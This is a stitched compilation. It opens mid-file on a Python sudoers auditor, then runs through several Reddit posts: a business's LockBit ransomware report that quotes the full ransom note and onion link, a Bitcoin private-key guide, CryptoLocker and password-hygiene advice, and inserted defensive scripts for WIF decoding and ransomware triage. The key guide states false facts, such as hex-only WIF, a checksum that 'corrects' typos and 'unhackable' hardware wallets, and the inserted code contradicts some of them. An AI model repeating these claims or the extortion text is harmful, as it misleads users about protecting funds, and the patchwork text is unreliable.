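        d = DEFAULTS_RE.match(line)
        if d:
            for opt in d.group(1).split(","):
                opt = opt.strip()
                if opt:
                    key, _, val = opt.partition("=")
                    defaults[key.strip()] = val.strip() if val else True
            continue
        m = GRANT_RE.match(line)
        if not m:
            continue
        who, hosts, runas, cmds = m.groups()
        grants.append({
            "who": who,
            "hosts": hosts,
            "runas": runas or "root",
            "nopasswd": bool(re.search(r"\bNOPASSWD\s*:", cmds)),
            "commands": [c.strip() for c in TAG_RE.sub("", cmds).split(",")],
        })
    return defaults, grants


def audit_sudoers(text):
    """Summarise the settings the post argues about."""
    defaults, grants = parse_sudoers(text)
    report = {
        "nopasswd_all": [],            # password-less root for every command
        "nopasswd_some": [],           # password-less for a fixed command list
        "timestamp_timeout": defaults.get("timestamp_timeout"),
        "use_pty": defaults.get("use_pty") is True,
    }
    for g in grants:
        if not g["nopasswd"]:
            continue
        bucket = "nopasswd_all" if g["commands"] == ["ALL"] else "nopasswd_some"
        report[bucket].append(g["who"])
    return report


if __name__ == "__main__":
    r = audit_sudoers(SAMPLE_SUDOERS)
    print("NOPASSWD for all commands :", r["nopasswd_all"] or "none")
    print("NOPASSWD for some commands:", r["nopasswd_some"] or "none")
    tt = r["timestamp_timeout"]
    if tt is None:
        print("timestamp_timeout         : unset (sudo's default caching period applies)")
    elif tt == "0":
        print("timestamp_timeout=0       : every sudo invocation prompts again")
    elif tt == "-1":
        print("timestamp_timeout=-1      : cached authentication never expires")
    else:
        print(f"timestamp_timeout={tt}     : minutes of cached authentication")
    print("use_pty                   :", "set" if r["use_pty"] else "NOT set")
```

Run against a real file with `audit_sudoers(open("/etc/sudoers").read())` as root; the point of the report is that "sudo asks for a password" and "the password is cached for the default period" are separate settings, and only the second is what the post's NOPASSWD proposal would change in day-to-day use.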

Small Business Just Hacked. [email protected] encryption asking for Ransom Bitcoin. Need Advice.

As a primer, longtime lurker but complete novice when it comes to hacking so thanks for your patience.
A few hours ago one of our employee's computers had a ransom note pop up on it and many of our network files started getting encrypted. The computer also had a window on it that looked similar to a command prompt that showed time updates (see image) and the amount of files encrypted every 5 minutes.
The hacker demanded bitcoin be sent to the email [email protected] and left a .txt file in every folder that read:
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?81F3696546327500B4B15998DEEEE1D5 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR.
Earlier today I opened up Remote Desktop from Windows Pro on her computer and configured port forwarding to her computer's IP. I also went into Windows Firewall on her computer and enabled all of the 'Remote Desktop' applications to bypass Firewall so the Remote Desktop would work properly. The employee whose computer was hacked was not working on her computer for about 5 hours leading up to the hack.
I guess my questions are:
  1. How can we track where this came from?
  2. Given she was not at her computer when this all happened, is this virus on a timer?
  3. How can we find out if other computers on our network are infected and will be on a timer as well?
  4. I am having a hard time believing that me opening up the computer to Remote Desktop is not somehow associated with the hack, but our IT admin insists it's not related. Could this have been the cause?
submitted by WIttyRemarkPlease to AskNetsec [link] [comments]

What Is Bitcoin Private Key: Beginner’s Guide

What Is Bitcoin Private Key: Beginner’s Guide
Most of the people in this sub probably already know what the Bitcoin private key is and how it works, but there are many newcomers who do not fully understand all the technical aspects of it. I hope you guys will find this guide useful.

Bitcoin Private Keys: The Basics

Let’s start with some main principles.
  • A private key is functionally similar to a password to your email account.
  • You need your private key to be able to receive the crypto someone sends you and to have access to your funds.
  • The BTC network does not store your private keys, they are generated and stored by the wallet software. There are different types of wallets.
Also, it is important to note that the private key concept does not apply exclusively to Bitcoin. Other cryptocurrencies use it too.
Now, let’s see how a private key looks and works.

Bitcoin Private Key Definition

A Bitcoin private key is an alphanumeric piece of code. It includes letters and numbers, just like your public address.
However, while a public address is like your plastic card number, a private key is like your CVC. You know, those secret three digits on the back of a card?
A private address is created in a random manner when you get a cryptocurrency wallet. The possibility of creating two identical private keys is almost zero, due to the sophisticated encryption algorithm we apply for the purpose.
In the BTC network, a private key contains 256 symbols, as we obtain it using the SHA256 encryption algorithm. This function always returns 256 symbols, no matter the input.
Bitcoin private key in various formats, including WIF.

Wallet Import Format (WIF)

Using such a long string of code is inconvenient, so a private key is often presented in WIF (Wallet Import Format). It’s a shortened version that includes only 51 characters (numbers from 0 to 9 and letters in the range of A-F) and begins with 5.
Here is a Bitcoin private key example in WIF:
5Kb8kLf9zgWQnogidDA76MzPL6TsZZY36hWXMssSzNydYXYB9KF
WIF has a few advantages over a full BTC private key version. As we have said, it’s shorter and more convenient to use. Also, it contains special pieces of code that serve to check the address for typos and correct them automatically.
WIF associates with only one private key and can be easily converted back into it, using an established algorithm.

Encrypting Private Keys

If a key looks like WIF but starts with 6, it is an encrypted version of a private key. People encrypt keys to ensure an extra layer of protection. To obtain such a string of code, we apply another algorithm. To decode (decrypt) the key we need to enter the password that we set when we were encrypting it.

How Bitcoin Private Key Works

You probably know Bitcoin as a digital payment system. To explain how it works, it would be better to compare it to a web-messenger, with messages transferring value. These ‘value messages’ are BTC transactions.
And what role does a private key play in sending these financial messages?
Let’s take a look at a real-life example.
https://preview.redd.it/lt1gwme8seu41.png?width=1261&format=png&auto=webp&s=87137c6ad2566affef82a6513090022f7dbb931e

Using Private And Public Keys For a Transaction

Imagine you are sending 1 BTC to your friend Bill. You create a transaction and indicate yourself as the sender and Bill as the receiver of this amount. Then, you will broadcast the transaction to make the Bitcoin network aware of it.
  1. You start by choosing a private key. Using a special encryption algorithm, you derive a public key from it. You send this public key to Bill.
  2. You create a message for Bill and sign it with your digital signature. To obtain it, you pass your private key through a special encryption algorithm and attach the resulting code to the message. Every signature is unique, and you can use the same private address to produce an infinite number of them.
  3. Bill receives your message, public key, and signature and passes it through a signature algorithm. If it’s the message you sent, the algorithm returns ok.
Why do we need a digital signature in the first place? There are three reasons. First, it tells the recipient that the message is from the sender he knows. Second, a digital signature makes it impossible for the sender to deny he sent the message. Third, it confirms that no one has altered the message in transit.
Unlike a traditional signature, a digital one cannot be forged. To produce it, you have to possess a secret private key.

https://preview.redd.it/8ta8ds3jseu41.png?width=624&format=png&auto=webp&s=79186fecbe58ecd8a393f644ad35e590361fbe86

Why Keeping Your Private Key Secret Is Important

As we have mentioned, anyone in possession of your private key can steal your funds anytime.
If your wicked colleague Alice gets your private key (because you carelessly left your paper wallet on your desk), she can use it to create a digital signature. She can then use that signature to sign a transaction that will look like yours for the network. For instance, Alice can send all your crypto to another address. You will never be able to cancel this transaction and you are highly unlikely to know that she made it.
For this reason, you should be very careful with your private keys. Never send them to anyone using a messenger, or an email client, or a social media channel. Don’t share photographs of your private key. Never store a private key in a Google Doc file.
Please note that some desktop wallet apps store your private key in a standard directory on your hard drive. This place is a honeypot for hackers who know you are a cryptocurrency user. That’s why it’s extremely important to have up-to-date anti-virus software installed on your device.
https://preview.redd.it/187j0ucmseu41.png?width=723&format=png&auto=webp&s=c9bccdd66ffabde2e623846c7e95930d5e62a625
Also, you may encrypt this wallet file to make it immune to malware. Many wallet apps provide this option. You will have to set a password to decrypt the private key, and the hacker will have to break this password to do it. If the password is strong, it will be a really difficult and time-consuming task.

Where To Store Private Keys: Mobile, Desktop And Hardware Wallets

As we have mentioned, the Bitcoin network does not store these keys. Instead, wallet services do it.

Mobile Wallets

Some of them allow you to keep and protect your private key, others do it automatically, applying various safety measures like 2FA or encryption. Note that nobody is responsible for it, your bitcoins will be gone if the service is hacked.

Desktop Wallets

Desktop wallets may be a good option. They provide BTC public and private keys in the format of a file that you can download and import. You can protect this file with a strong password and safely store it on a hard drive. Don’t forget about safe storage for this drive, too. For instance, use a bank vault for this purpose.

Cold (Hardware) Wallets

Hardware wallets are the safest ones. They are small USB devices designed to store your funds and private keys offline, away from anyone who could steal them. For this very reason, hardware (or cold) wallets are impossible to hack. If you accidentally lose, damage or destroy such a device, you can recover your BTC and private keys using a backup phrase. The best-selling models of hardware wallets are Trezor and Ledger Nano S, supporting several popular coins.

https://preview.redd.it/jmpyl3yoseu41.png?width=803&format=png&auto=webp&s=ef70101a853eaaedea8d0fb5d2d1690cce16c989

Paper Wallets

These wallets are sheets of paper with BTC private keys and public addresses printed on them. Paper wallets look pretty basic and not very innovative, but they're a safe way to store your BTC-related sensitive data. The main reason is that they are not connected to the Internet and thus are unreachable for malware attacks. This format is also immune to many mishaps that can affect electronic devices. To create a paper wallet you use a special web service like WalletGenerator.

P.S. Check out our blog if you are interested in more articles on crypto and finance
submitted by EX-SCUDO to Bitcoin [link] [comments]
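As an added example that is not part of the guide, here is the WIF encoding the post describes, implemented in Python with only the standard library. It shows what the "special pieces of code" are: a four-byte checksum (the first four bytes of SHA-256 applied twice) appended to the version byte and the 32-byte key before Base58 encoding. The checksum lets wallet software detect a mistyped key, which the code below rejects rather than repairs, and it round-trips the post's own example key. Function names are this example's; the constructed 32-byte test key is not a real key.

```python
"""Added example (not from the post): Wallet Import Format with Base58Check."""
import hashlib

# Bitcoin's Base58 alphabet: no 0, O, I or l, to avoid look-alike typos.
ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
MAINNET_PRIVKEY_VERSION = 0x80      # version byte that makes the WIF start with 5, K or L
PAGE_WIF = "5Kb8kLf9zgWQnogidDA76MzPL6TsZZY36hWXMssSzNydYXYB9KF"   # the post's example


def b58encode(data: bytes) -> str:
    """Base58 of data, with one leading '1' per leading zero byte."""
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, r = divmod(n, 58)
        digits.append(ALPHABET[r])
    pad = len(data) - len(data.lstrip(b"\0"))
    return (ALPHABET[:1] * pad + bytes(reversed(digits))).decode()


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s.encode():
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"not a Base58 character: {chr(ch)!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\0" * pad + body


def checksum(payload: bytes) -> bytes:
    """First four bytes of SHA-256(SHA-256(payload))."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def wif_encode(privkey: bytes, compressed: bool = False) -> str:
    """Version byte + 32-byte key (+ 0x01 for compressed public keys) + checksum."""
    if len(privkey) != 32:
        raise ValueError("a raw private key is exactly 32 bytes")
    payload = bytes([MAINNET_PRIVKEY_VERSION]) + privkey + (b"\x01" if compressed else b"")
    return b58encode(payload + checksum(payload))


def wif_decode(wif: str):
    """Return (privkey, compressed). Raises ValueError on a typo or wrong format;
    the checksum can only detect a corrupted key, never recover it."""
    raw = b58decode(wif)
    if len(raw) < 5:
        raise ValueError("too short to hold a key and checksum")
    payload, chk = raw[:-4], raw[-4:]
    if checksum(payload) != chk:
        raise ValueError("checksum mismatch: the key was mistyped or corrupted")
    if payload[0] != MAINNET_PRIVKEY_VERSION:
        raise ValueError("not a mainnet private key")
    if len(payload) == 33:
        return payload[1:], False
    if len(payload) == 34 and payload[-1] == 0x01:
        return payload[1:33], True
    raise ValueError("unexpected payload length")


def wif_is_valid(wif: str) -> bool:
    try:
        wif_decode(wif)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key, compressed = wif_decode(PAGE_WIF)
    print("post's example decodes to", len(key), "bytes, compressed =", compressed)
    print("re-encoded matches:", wif_encode(key, compressed) == PAGE_WIF)
    typo = PAGE_WIF[:-1] + "G"          # one mistyped character at the end
    print("typo version accepted:", wif_is_valid(typo))
```

Note that the uncompressed form is 51 characters starting with 5, and the compressed form (one extra 0x01 byte) is 52 characters starting with K or L; the encoded characters are drawn from the 58-symbol alphabet above, not hexadecimal digits.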

Discuss: Issues with Storing Bitcoins in long term.

First: Hodler here. Very bullish. Hodling for a decade more, not selling except for food n bills. I 100% agree with the economics of bitcoin.
Something that's not discussed much. IMHO storing BTC safely long term is challenging. Unlike keeping cash or gold at home, Bitcoin has a much larger attack area.
Possible issues not in cash/gold:
  1. Forget password for encrypted seed or wallet file
  2. Forget location of seed on paper, usb with seed. Part of multi sig. Misplaced, thrown by family, help
  3. Seed incorrectly written.
  4. Wrong seed written, when multiple wallets. People have lost BTC this way.
  5. Only private key written. Not realised it changes after a transaction.
  6. Fire, water damage. Same issue with cash.
  7. Bad ink fades away.
  8. Death.
None of the above exist with gold and one with cash. With death there are inheritance laws if the gold is in a bank. At home, people at home know where gold is, no chance of misplacing or forgetting.
Haven't even started with theft:
  1. Seed phrases online! Dropbox, Gmail, PC
  2. BTC in online wallets!
  3. Bad marriage. Spouse can take seed away in shoe sole. Plausible deniability. No way to prove it. Gold, cash are harder, and much harder with larger amounts. Gold is also kept in bank lockers by some.
  4. Any family member can copy seed, use it in future if things go bad.
  5. Fights in family - destroy seed in rage.
  6. Tampered wallet software, hardware wallets.
  7. Malicious browser extensions
  8. Hardware keyloggers, viruses, compromised router
  9. OS bugs, processor bugs, wallet software bugs
  10. DNS hijacking, phishing
Gold, cash have their own problems. But most important issue is Knowledge. With Gold, people know what to expect. Stealing, losing objects is something everyone naturally understands. With Bitcoin there are new ways in which things can go bad. Maybe most people will never understand the possibilities here? Note: issues are for long term storage. Families change, locations change, Devices change, maybe attack areas change.
Not to diss on BTC. Just think there could be more awareness here. To keep BTC safe/r. Development of tools, methods, PC's ?
Edit: expected better :(
submitted by batbitcoin to Bitcoin [link] [comments]

College Education Resources

Not a complete list, but somewhere to start
United States
submitted by chrisknight1985 to cybersecurity [link] [comments]

YSK about CryptoLocker, a virus that encrypts all possible files and then demands $300 to decrypt them.

CryptoLocker is gaining quite a bit of traction recently. Once infected (usually via email attachments but other methods have been reported) it begins encrypting individual files that match certain filetypes (pdf, doc, xls, dwg, sld, the list goes on). It will encrypt any non-system files on your PC which your user has write access to. It will also encrypt files on networked drives that it has write access to.
After it thinks it is done encrypting everything it displays a message letting you know that everything is encrypted and demands $300 to decrypt the files starting with a 100 hour countdown. After the 100 hours is up the virus uninstalls itself and you won't be able to get your files back. AT ALL.
The good news is, if you have backups you can restore those after you have cleaned the virus. You can also pay the $300 and it will actually decrypt the files, but the actual end-point of the money is unknown. It could go to a single person, or a terrorist organization.
You Should Know about this because it can wreak havoc on your home computer, but can also wreck your company's shared drives and such if the virus is on a work computer.
More technical details here:
submitted by SpectralCoding to YouShouldKnow [link] [comments]
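Both the LockBit post above (the one asking when the encryption started and which machines are affected) and this CryptoLocker post describe the same on-disk traces: a note dropped into every folder and files rewritten as unreadable data, on the local disk and on any network share the user could write to. The Python script below is an added example, not taken from either post. It walks a tree read-only, finds notes by the phrase quoted in the LockBit note, flags files whose content is near-random by Shannon entropy, and reports the earliest modification time and the affected folders. That timeline is what answers the "is it on a timer?" question once it is compared against logon and remote-access logs, and the folder list says which shares need restoring from backup. The sample tree, file names, note text and timestamps are constructed; nothing is renamed or rewritten, so the scan does not disturb evidence.

```python
"""Added example (not from either post): read-only triage of a file tree after
a ransomware event."""
import math
import os
import tempfile

NOTE_MARKER = b"all your important files are encrypted"   # phrase from the quoted note
ENTROPY_THRESHOLD = 7.5    # bits per byte; encrypted or random data sits close to 8.0
MIN_SIZE = 1024            # entropy of very small files is not meaningful
SAMPLE_T0 = 1_600_000_000  # constructed epoch timestamp used by the sample tree


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data, from 0.0 (one value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def classify_file(path: str) -> str:
    """'note' if the file carries the ransom text, 'suspicious' if its content
    looks random, else 'normal'. Compressed archives, images and video also
    score high, so 'suspicious' is a triage signal to confirm, not a verdict."""
    with open(path, "rb") as fh:
        head = fh.read(65536)
    if NOTE_MARKER in head.lower():
        return "note"
    if len(head) >= MIN_SIZE and shannon_entropy(head) >= ENTROPY_THRESHOLD:
        return "suspicious"
    return "normal"


def scan_tree(root: str) -> dict:
    """Collect notes, suspicious files, the earliest modification time among
    them (when the encryption run started), and suspicious files per folder."""
    report = {"notes": [], "suspicious": [], "first_seen": None, "dirs": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            kind = classify_file(path)
            if kind == "normal":
                continue
            mtime = os.path.getmtime(path)
            if report["first_seen"] is None or mtime < report["first_seen"]:
                report["first_seen"] = mtime
            rel = os.path.relpath(path, root)
            if kind == "note":
                report["notes"].append(rel)
            else:
                report["suspicious"].append(rel)
                folder = os.path.dirname(rel) or "."
                report["dirs"][folder] = report["dirs"].get(folder, 0) + 1
    report["notes"].sort()
    report["suspicious"].sort()
    return report


def build_sample_tree(root: str) -> str:
    """Constructed sample: two affected 'shares' and one untouched folder."""
    note = (b"All your important files are encrypted!\n"
            b"(constructed sample note for the triage example)\n")
    plain = b"Quarterly figures, constructed sample text, nothing sensitive here.\n" * 40
    files = {  # relative path: (content, modification time)
        "finance/report.txt":          (plain,            SAMPLE_T0 - 86400),
        "finance/invoice.docx.locked": (os.urandom(4096), SAMPLE_T0 + 60),
        "finance/RESTORE-FILES.txt":   (note,             SAMPLE_T0 + 300),
        "drawings/plan.dwg.locked":    (os.urandom(4096), SAMPLE_T0 + 120),
        "drawings/RESTORE-FILES.txt":  (note,             SAMPLE_T0 + 300),
        "hr/handbook.txt":             (plain,            SAMPLE_T0 - 86400),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
    return root


def run_demo() -> dict:
    root = tempfile.mkdtemp(prefix="ransom-triage-")
    return scan_tree(build_sample_tree(root))


if __name__ == "__main__":
    r = run_demo()
    print("ransom notes      :", r["notes"])
    print("suspicious files  :", r["suspicious"])
    print("first activity    :", r["first_seen"], "(epoch seconds)")
    print("folders to restore:", r["dirs"])
```

On a real incident point `scan_tree` at each mapped share and the local profile, then line the `first_seen` value up against the machine's logon, RDP and firewall-change timestamps; a first encrypted file that predates the user's absence, or that appears right after a remote session, settles the "timer or not" question better than guessing.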

The importance of being mindful of security at all times - nearly everyone is one breach away from total disaster

This is a long one - TL;DR at the end!

If you haven't heard yet: BlankMediaGames, makers of Town of Salem, have been breached which resulted in almost 8 million accounts being leaked. For most people, the first reaction is "lol so what it's just a game, why should I really care?" and that is the wrong way to look at it. I'd like to explain why everyone should always care whenever they are part of a breach. I'd also like to talk about some ways game developers - whether they work solo or on a team - can take easy steps to help protect themselves and their customers/players.
First I'd like to state that there is no practical way to achieve 100% solid security to guarantee you'll never be breached or part of a breach. The goal here will be to get as close as possible, or comfortable, so that you can rest easy knowing you can deal with problems when they occur (not if, when).

Why You Should Care About Breaches

The sad reality is most people re-use the same password everywhere. Your email account, your bank account, your steam account, your reddit account, random forums and game websites - you get the idea. If you haven't pieced it together yet the implication is that if anyone gets your one password you use everywhere, it's game over for you - they now own all of your accounts (whether or not they know it yet). Keep in mind that your email account is basically the holy grail of passwords to have. Most websites handle password changes/resets through your email; thus anyone who can login to your email account can get access to pretty much any of your accounts anywhere. Game over, you lose.

But wait, why would anyone want to use my password? I'm nobody!

It doesn't matter, the bad guys sell this information to other bad guys. Bots are used to make as much use of these passwords as possible. If they can get into your bank they might try money transfers. If they get into your Amazon account they might spin up $80,000 worth of servers to mine Bitcoin (or whatever coin is popular at the time). They don't care who you are; it's all automated.
By the way, according to this post (which looks believable enough to be real) this is pretty much how they got into the BMG servers initially. They checked for usernames/emails of admins on the BMG website(s) in previous breach dumps (of which there are many) and found at least one that used the same password on other sites - for their admin account!
If you want to see how many of your accounts are already breached check out Have I Been Pwned - I recommend registering all of your email addresses as well so you get notified of future breaches. This is how I found out about the Town of Salem breach, myself.

How You Can Protect Yourself

Before I go into all the steps you can (and should) take to protect yourself I should note that security is in a constant tug of war with convenience. What this means is that the more security measures you apply the more inconvenienced you become for many tasks. It's up to you to decide how much is too much either way.
First of all I strongly recommend registering your email(s) on https://haveibeenpwned.com/ - this is especially important if your email address is associated to important things like AWS, Steam developer account, bank accounts, social media, etc. You want to know ASAP when an account of yours is compromised so you can take steps to prevent or undo damage. Note that the bad guys have a head start on this!

Passwords

You probably need to have better password hygiene. If you don't already, you need to make sure every account you have uses a different, unique, secure password. You should change these passwords at least once a year. Depending on how many accounts you have and how good your memory is, this is your first big security vs convenience trade-off battle. That's easily solved, though, by using a password manager. You can find a list of password managers on Wikipedia here or you can search around for some comparison articles.
Some notable choices to consider:
Regardless of which one you choose, any of them is 100x better than not using one at all.

Multi-Factor Authentication / Two-Factor Authentication (aka MFA / 2FA)

The problem with all these passwords is that someone can still use them if they are found in a breach. Your passwords are only as strong as the website you use them on. In the case of the BMG breach mentioned above - all passwords were stored in an ancient format which has been insecure for years. It's likely that every single password in the breach can be reversed/cracked, or already has been. The next step you need to take is to make it harder for someone else to login with your password. This is done using Multi-Factor Authentication (or Two-Factor Authentication).
Unfortunately not every website/service supports MFA/2FA, but you should still use it on every single one that does support it. You can check which sites support MFA/2FA here or dig around in account options on any particular site. You should setup MFA/2FA on your email account ASAP! If it's not supported, you need to switch to a provider that does support it. This is more important than your bank account! All of the big email providers support it: GMail, Outlook.com, Yahoo Mail, etc.
The type of MFA/2FA you use depends on what is supported by each site/service, but there is a common approach that is compatible on many of them. Most of them involve phone apps because a phone is the most common and convenient "thing you have" that bad guys (or anyone, really) can't access easily. Time-based One-time Password or TOTP is probably the most commonly used method because it's easy to implement and can be used with many different apps. Google Authenticator was the first popular one, but it has some limitations which continue the security vs convenience battle - namely that getting a new phone is a super huge chore (no backup/restore option - you have to disable and setup each site all over again). Many alternatives support cloud backup which is really convenient, though obviously less secure by some measure.
Notable choices to consider:
Some sites/services use their own app, like Blizzard (battle.net) and Steam, and don't allow you to use other ones. You will probably have a few apps on your phone when all your accounts are setup, but it's worth it. You'll definitely want to enable it on your password manager as well if you chose a cloud-based one.
Don't forget to save backup codes in an actual secure location! If you lose your backup codes and your auth app/physical key you will be locked out of accounts. It's really not fun recovering in that situation. Most recommendations are to print them and put in a fireproof safe, but using some other secure encrypted storage is fine.
There is such a thing as bad MFA/2FA! However, anything is at least better than nothing. A lot of places still use SMS (text messaging) or e-mail for their MFA/2FA implementation. The e-mail one has the most obvious flaw: If someone gets into your email account they have defeated that security measure. The SMS flaws are less obvious and much less likely to affect you, but still a risk: SMS is trivial to intercept (capture data over the air (literally), clone your SIM card data, and some other methods). Still, if you're not a person of interest already, it's still better than nothing.

What Does This Have To Do With GameDev?

Yeah, I do know which subreddit I'm posting in! Here's the section that gets more into things specific to game development (or software development in general).

Secure Your Code

Securing your code actually has multiple meanings here: Securing access to your code, and ensuring your code itself is secure against exploitation. Let's start with access since that's the easier topic to cover!
If you're not already using some form of Source Control Management (SCM) you really need to get on board! I'm not going to go in depth on that as it's a whole other topic to itself, but I'll assume you are using Git or Mercurial (hg) already and hosting it on one of these sites (or a similar one):
First, ensure that you have locked down who can access this code already. If you are using private repositories you need to make sure that the only people who have access are the people who need access (i.e. yourself and your team). Second, everyone should have strong passwords and MFA/2FA enabled on their accounts. If 1 person on the team does not follow good security practices it puts your whole project at risk! So make sure everyone on the team is following along. You can also look into tools to do some auditing and even automate it so that if anyone's account becomes less secure over time (say they turned off MFA one day) they would automatically lose their access.
Additionally you should never commit secrets (passwords, API keys, tokens, social security numbers, etc) to your code repository. Probably 90% of cases where people have their AWS/Google Cloud/Azure accounts compromised and racking up huge bills for bitcoin mining is due to having their passwords/keys stored in their git repo. They either accidentally made it public or someone got access to the private repo through a compromised account. Never store sensitive information in your code repository!
Next topic: Securing your code from vulnerabilities. This one is harder to talk about for game dev as most engines/frameworks are not as susceptible (for lack of a better word) to these situations as others. In a nutshell, you need to keep track of the following:
A lot of these things cannot be solved automatically, unfortunately, but some of it can. If you are using JavaScript for your game you likely will be using packages from npm - luckily they (recently) added security auditing for packages. For other languages you can look at tools like Snyk or some other alternatives to audit the libraries you use in your project. Unfortunately none that I know of are aimed at game dev in particular, but it's still important to use these tools when you can. In general, be aware of all of your code dependencies and what impact they can have on your game or your customers if there are security bugs. Impact can range from "can cheat in multiplayer" to "can get IP addresses of all players in the world" or even "can get all information I ever put on my server", etc.
In general you'll want to look into Secure Software Development Lifecycle (commonly SDLC) practices. Microsoft has some information on how they do it.

Secure Your Computer

I'm not going to go in depth on this one because at this point everyone should have a handle on this; if not there are limitless articles, blogs, and videos about the how/what/why. In summary: Keep everything updated, and don't open suspicious links.